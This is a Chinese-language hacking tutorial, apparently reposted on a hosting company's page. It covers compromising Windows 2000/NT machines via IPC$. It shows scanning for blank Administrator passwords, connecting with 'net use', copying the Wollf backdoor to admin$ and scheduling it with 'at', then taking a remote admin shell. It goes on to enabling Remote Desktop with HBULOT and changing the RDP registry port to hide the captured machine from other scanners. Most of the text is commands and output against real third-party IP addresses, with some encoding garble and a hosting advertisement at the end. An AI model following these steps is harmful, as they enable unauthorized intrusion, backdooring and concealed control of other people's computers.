|
怎樣從ipc$到開(kāi)放3389到最后3389只為你服務(wù)!
工具:流光4.7 (http://www.heibai.net/download/show.php?id=2277&down=1)
Wollf v1.6 (http://www.heibai.net/download/show.php?id=2996&down=1)
HBULOT (http://www.heibai.net/download/show.php?id=2951&down=1)
本機(jī)平臺(tái):2000/NT
目標(biāo)平臺(tái):2000/NT
以上工具在黑白均能找到�,具體使用方法會(huì)在文章中會(huì)介紹。
首先打開(kāi)流光(如果你連流光都沒(méi)聽(tīng)過(guò)過(guò)的話(huà)�����,我想你沒(méi)必要看這篇文章),Ctrl+A���,填上一段ip�����,選擇IPC掃
描��。過(guò)一會(huì)有結(jié)果了:
218.22.155.* (SERVER)
--------------------------------------------------------------------------------
IPC掃描
獲得共享列表
g f e h I
獲得用戶(hù)列表
029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser
猜解成功用戶(hù)帳號(hào) Administrator (Admin):(NULL)
隨便找了一臺(tái)做實(shí)驗(yàn)���,先ipc$連上再說(shuō)。
==========================================================================================
C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------連接成功����!
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷貝wollf.exe到目標(biāo)計(jì)算機(jī)的admin$目錄
已復(fù)制 1 個(gè)文件��。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷貝hbulot.exe到目標(biāo)計(jì)算機(jī)的admin$目錄
已復(fù)制 1 個(gè)文件�����。
C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的當(dāng)前時(shí)間是 2002/12/1 上午 06:37
命令成功完成��。
C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一項(xiàng)作業(yè)���,其作業(yè) ID = 1--指定wollf.exe在06:39運(yùn)行
------------------------------------------------------------------------------------------
說(shuō)明:
wollf.exe是一個(gè)后門(mén)程序�,很多高手都喜歡nc或者winshell,不過(guò)我對(duì)他情有獨(dú)鐘�����!在這里我只介紹與本文內(nèi)
容有關(guān)的命令參數(shù)�,它的高級(jí)用法不做補(bǔ)充。
hbulot.exe是用于開(kāi)啟3389服務(wù)�����,如果不是server及以上版本���,就不要運(yùn)行了。因?yàn)閜ro版不能安裝終端服務(wù)��。
2分鐘后......
==========================================================================================
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
說(shuō)明:
使用wollf連接時(shí)要注意wollf.exe要在當(dāng)前目錄�����,它的連接命令格式:wollf -connect IP 7614
7614是wollf開(kāi)放的端口�����。如果顯示如上,說(shuō)明你已經(jīng)連接成功���,并具有管理員administrator權(quán)限���。
==========================================================================================
[server@D:\WINNT\system32]#dos
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權(quán)所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
說(shuō)明:
輸入dos,你就會(huì)進(jìn)入目標(biāo)機(jī)的cmd下,這時(shí)同樣具有administrator權(quán)限�。
==========================================================================================
D:\WINNT\system32>cd..
cd..
D:\WINNT>dir h*.*
dir h*.*
驅(qū)動(dòng)器 D 中的卷沒(méi)有標(biāo)簽。
卷的序列號(hào)是 1CE5-2615
D:\WINNT 的目錄
2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 個(gè)文件 35,328 字節(jié)
1 個(gè)目錄 9,049,604,096 可用字節(jié)
D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
說(shuō)明:
因?yàn)槲覀儼袶BULOT.exe放到目標(biāo)機(jī)的admin$下的����,所以先找到它,以上是文件的存放位置�。
==========================================================================================
D:\WINNT>exit
exit
Command "DOS" succeed.
[server@D:\WINNT\system32]#reboot
Command "REBOOT" succeed.
[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
說(shuō)明:
由dos退到wollf的連接模式下用exit命令,HBULOT.exe運(yùn)行后需重新啟動(dòng)方可生效�,這里wollf自帶的REBOOT
命令,執(zhí)行過(guò)在5秒后你就會(huì)失去連接�。啟動(dòng)完畢后檢查一下3389端口是否開(kāi)放,方法很多���,superscan3掃一下
����。這時(shí)候你就可以登陸了��。如果沒(méi)有開(kāi)放3389那就不是server及以上版本,就不要運(yùn)行了��。因?yàn)閜ro版不能安裝
終端服務(wù)�����。
到這里�����,你已經(jīng)擁有3389肉雞了����!但是會(huì)不會(huì)被別的入侵者發(fā)現(xiàn)呢?下面所教的就是怎么讓3389只為你服務(wù)���!
我們現(xiàn)在使用的3389登陸器有兩種版本,一種是2000/98�,一種是XP。二者區(qū)別呢���?前者使用的默認(rèn)端口3389對(duì)
目標(biāo)���,后者默認(rèn)的也是3389端口����,但是它還支持別的端口進(jìn)行連接���!所以呢......我們來(lái)修改3389的連接端口
來(lái)躲過(guò)普通掃描器的掃描���!修改方法如下:
修改服務(wù)器端的端口設(shè)置 ,注冊(cè)表有2個(gè)地方需要修改���。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值���,默認(rèn)是3389,修改成所希望的端口���,比如1314
第二個(gè)地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值��,默認(rèn)是3389����,修改成所希望的端口�����,比如1314
現(xiàn)在這樣就可以了。重啟系統(tǒng)吧�。
注意:事實(shí)上,只修改第二處也是可以的����。另外,第二處的標(biāo)準(zhǔn)聯(lián)結(jié)應(yīng)該是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具體的某個(gè)RDP-TCP連結(jié)�。
重啟過(guò)后,看看端口有沒(méi)有改���。
小技巧:修改注冊(cè)表鍵值時(shí)�����,先選擇10進(jìn)制���,輸入你希望的端口數(shù)值,再選擇16進(jìn)制��,系統(tǒng)會(huì)自動(dòng)轉(zhuǎn)換�。
億恩科技地址(ADD):鄭州市黃河路129號(hào)天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話(huà):0371-63322206
本文出自:億恩科技【1tcdy.com】
服務(wù)器租用/服務(wù)器托管中國(guó)五強(qiáng)���!虛擬主機(jī)域名注冊(cè)頂級(jí)提供商!15年品質(zhì)保障����!--億恩科技[ENKJ.COM]
|
香港服務(wù)器租用
美國(guó)服務(wù)器租用
電信骨干機(jī)房
聯(lián)通骨干機(jī)房
0371-60135900
